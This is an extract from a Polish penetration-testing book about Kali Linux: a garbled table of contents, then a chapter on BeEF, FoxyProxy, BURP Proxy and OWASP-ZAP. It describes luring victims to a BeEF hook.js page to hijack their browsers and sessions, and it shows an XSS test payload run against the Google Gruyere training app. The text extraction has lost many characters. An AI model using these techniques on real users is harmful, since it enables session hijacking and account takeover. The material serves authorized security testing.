Zadania rekonesansu 52Rozpoznanie wst pne 53

Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54

Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83

Podsumowanie 89

Rozdzia 3 Ataki na serwery aplikacji internetowych 91

Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112

Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120

Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125

Hydra 125DirBuster 128WebSlayer 131

amanie hase 137John the Ripper 137

Ataki typu man-in-the-middle 139SSLStrip 140

Podsumowanie 145

Kup książkę Poleć książkę

Spis tre ci

5

Rozdzia 4 Ataki na klienty aplikacji internetowych 147

In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149

Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162

Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169

Has a w systemie Windows 171Has a w systemie Linux 173

Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185

Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191

Podsumowanie 191

Rozdzia 5 Ataki na metody uwierzytelniania 193

Ataki na zarz dzanie sesjami 195Clickjacking 196

Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198

Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217

Wstrzykiwanie kodu SQL 218sqlmap 221

Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224

Techniki XSS cookie stealing i Authentication hijacking 225

Kup książkę Poleć książkę

Spis tre ci

6

Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229

Podsumowanie 229

Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231

BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255

THX-SSL-DOS 257Scapy 259Slowloris 261

LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266

DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270

Podsumowanie 270

Rozdzia 7 Przeciwdzia anie i zapobieganie 271

Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277

Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281

Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284

Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287

Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295

Podsumowanie 300

Kup książkę Poleć książkę

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

